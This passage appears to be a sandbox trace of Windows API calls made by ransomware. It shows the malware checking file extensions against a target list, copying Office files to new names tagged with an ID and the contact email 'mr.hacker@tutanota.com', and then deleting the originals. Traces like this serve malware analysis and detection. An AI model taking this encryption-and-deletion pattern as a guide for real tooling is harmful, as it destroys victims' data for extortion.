(lpString=".ppt") returned 4 [0274.043] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString=".zip") returned 4 [0274.043] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString=".rar") returned 4 [0274.043] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString=".bz2") returned 4 [0274.043] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.043] lstrlenW (lpString=".7z") returned 3 [0274.043] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.044] lstrlenW (lpString=".dbf") returned 4 [0274.044] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.044] lstrlenW (lpString=".1cd") returned 4 [0274.044] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.044] lstrlenW (lpString=".jpg") returned 4 [0274.044] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.044] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0274.044] lstrlenW (lpString="HVAC.VSL") returned 8 [0274.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.045] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=36200) returned 1 [0274.045] CloseHandle (hObject=0x3c0) returned 1 [0274.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 0x20 [0274.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.045] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.045] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.046] GetLastError () returned 0x0 [0274.046] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x8d68, lpOverlapped=0x0) returned 1 [0274.048] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x8d70, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x8d70, lpOverlapped=0x0) returned 1 [0274.049] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.049] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0274.049] SetEndOfFile (hFile=0x2ac) returned 1 [0274.050] CloseHandle (hObject=0x2ac) returned 1 [0274.050] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.050] SetEndOfFile (hFile=0x3c0) returned 1 [0274.052] CloseHandle (hObject=0x3c0) returned 1 [0274.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 1 [0274.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.052] lstrlenW (lpString=".doc") returned 4 [0274.053] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString=".docx") returned 5 [0274.053] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0274.053] lstrlenW (lpString=".pdf") returned 4 [0274.053] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString=".xls") returned 4 [0274.053] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0274.053] lstrlenW (lpString=".xlsx") returned 5 [0274.053] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0274.053] lstrlenW (lpString=".ppt") returned 4 [0274.053] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.053] lstrlenW (lpString=".zip") returned 4 [0274.053] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0274.053] lstrlenW (lpString=".rar") returned 4 [0274.053] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString=".bz2") returned 4 [0274.053] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString=".7z") returned 3 [0274.053] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.053] lstrlenW (lpString=".dbf") returned 4 [0274.053] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.053] lstrlenW (lpString=".1cd") returned 4 [0274.053] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0274.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.053] lstrlenW (lpString=".jpg") returned 4 [0274.053] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString=".doc") returned 4 [0274.054] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString=".docx") returned 5 [0274.054] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0274.054] lstrlenW (lpString=".pdf") returned 4 [0274.054] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString=".xls") returned 4 [0274.054] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0274.054] lstrlenW (lpString=".xlsx") returned 5 [0274.054] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0274.054] lstrlenW (lpString=".ppt") returned 4 [0274.054] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString=".zip") returned 4 [0274.054] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0274.054] lstrlenW (lpString=".rar") returned 4 [0274.054] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString=".bz2") returned 4 [0274.054] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString=".7z") returned 3 [0274.054] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString=".dbf") returned 4 [0274.054] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString=".1cd") returned 4 [0274.054] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0274.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0274.054] lstrlenW (lpString=".jpg") returned 4 [0274.055] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0274.217] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0274.217] lstrlenW (lpString="INFOPATHEDITOR_COL.HXC") returned 22 [0274.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.317] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=666) returned 1 [0274.317] CloseHandle (hObject=0x3c0) returned 1 [0274.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc")) returned 0x20 [0274.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.421] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.421] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.424] GetLastError () returned 0x0 [0274.424] ReadFile (in: hFile=0x2ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x29a, lpOverlapped=0x0) returned 1 [0274.426] WriteFile (in: hFile=0x3c0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x2a0, lpOverlapped=0x0) returned 1 [0274.426] ReadFile (in: hFile=0x2ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.426] WriteFile (in: hFile=0x3c0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x100, lpOverlapped=0x0) returned 1 [0274.426] SetEndOfFile (hFile=0x3c0) returned 1 [0274.426] CloseHandle (hObject=0x3c0) returned 1 [0274.427] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.427] SetEndOfFile (hFile=0x2ac) returned 1 [0274.428] CloseHandle (hObject=0x2ac) returned 1 [0274.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.432] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc")) returned 1 [0274.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.432] lstrlenW (lpString=".doc") returned 4 [0274.433] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.433] lstrlenW (lpString=".docx") returned 5 [0274.433] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.433] lstrlenW (lpString=".pdf") returned 4 [0274.433] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.433] lstrlenW (lpString=".xls") returned 4 [0274.433] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.433] lstrlenW (lpString=".xlsx") returned 5 [0274.433] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.433] lstrlenW (lpString=".ppt") returned 4 [0274.433] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.433] lstrlenW (lpString=".zip") returned 4 [0274.433] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.433] lstrlenW (lpString=".rar") returned 4 [0274.433] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.433] lstrlenW (lpString=".bz2") returned 4 [0274.433] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.433] lstrlenW (lpString=".7z") returned 3 [0274.433] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.433] lstrlenW (lpString=".dbf") returned 4 [0274.433] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.433] lstrlenW (lpString=".1cd") returned 4 [0274.434] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.434] lstrlenW (lpString=".jpg") returned 4 [0274.434] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.434] lstrlenW (lpString=".doc") returned 4 [0274.434] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.434] lstrlenW (lpString=".docx") returned 5 [0274.434] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.434] lstrlenW (lpString=".pdf") returned 4 [0274.434] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString=".xls") returned 4 [0274.434] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString=".xlsx") returned 5 [0274.434] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.434] lstrlenW (lpString=".ppt") returned 4 [0274.434] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.434] lstrlenW (lpString=".zip") returned 4 [0274.434] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString=".rar") returned 4 [0274.434] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.434] lstrlenW (lpString=".bz2") returned 4 [0274.434] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.434] lstrlenW (lpString=".7z") returned 3 [0274.434] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.434] lstrlenW (lpString=".dbf") returned 4 [0274.434] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.435] lstrlenW (lpString=".1cd") returned 4 [0274.435] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70 [0274.435] lstrlenW (lpString=".jpg") returned 4 [0274.435] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.435] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0274.435] lstrlenW (lpString="INVENTRY.VRD") returned 12 [0274.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.435] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=818) returned 1 [0274.435] CloseHandle (hObject=0x3b0) returned 1 [0274.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd")) returned 0x20 [0274.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.436] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.436] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.436] GetLastError () returned 0x0 [0274.436] ReadFile (in: hFile=0x3b0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x332, lpOverlapped=0x0) returned 1 [0274.446] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x340, lpOverlapped=0x0) returned 1 [0274.447] ReadFile (in: hFile=0x3b0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.447] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.447] SetEndOfFile (hFile=0x394) returned 1 [0274.447] CloseHandle (hObject=0x394) returned 1 [0274.447] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.447] SetEndOfFile (hFile=0x3b0) returned 1 [0274.449] CloseHandle (hObject=0x3b0) returned 1 [0274.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd")) returned 1 [0274.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.450] lstrlenW (lpString=".doc") returned 4 [0274.450] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString=".docx") returned 5 [0274.450] lstrcmpiW (lpString1=".docx", lpString2="Y.VRD") returned -1 [0274.450] lstrlenW (lpString=".pdf") returned 4 [0274.450] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString=".xls") returned 4 [0274.450] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.450] lstrlenW (lpString=".xlsx") returned 5 [0274.450] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VRD") returned -1 [0274.450] lstrlenW (lpString=".ppt") returned 4 [0274.450] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.450] lstrlenW (lpString=".zip") returned 4 [0274.450] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.450] lstrlenW (lpString=".rar") returned 4 [0274.450] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString=".bz2") returned 4 [0274.450] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString=".7z") returned 3 [0274.450] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.450] lstrlenW (lpString=".dbf") returned 4 [0274.450] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.450] lstrlenW (lpString=".1cd") returned 4 [0274.450] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.450] lstrlenW (lpString=".jpg") returned 4 [0274.450] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.451] lstrlenW (lpString=".doc") returned 4 [0274.451] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString=".docx") returned 5 [0274.451] lstrcmpiW (lpString1=".docx", lpString2="Y.VRD") returned -1 [0274.451] lstrlenW (lpString=".pdf") returned 4 [0274.451] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString=".xls") returned 4 [0274.451] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.451] lstrlenW (lpString=".xlsx") returned 5 [0274.451] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VRD") returned -1 [0274.451] lstrlenW (lpString=".ppt") returned 4 [0274.451] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.451] lstrlenW (lpString=".zip") returned 4 [0274.451] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.451] lstrlenW (lpString=".rar") returned 4 [0274.451] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString=".bz2") returned 4 [0274.451] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString=".7z") returned 3 [0274.451] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60 [0274.451] lstrlenW (lpString=".dbf") returned 4 [0274.451] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.451] lstrlenW (lpString="C:\\Program 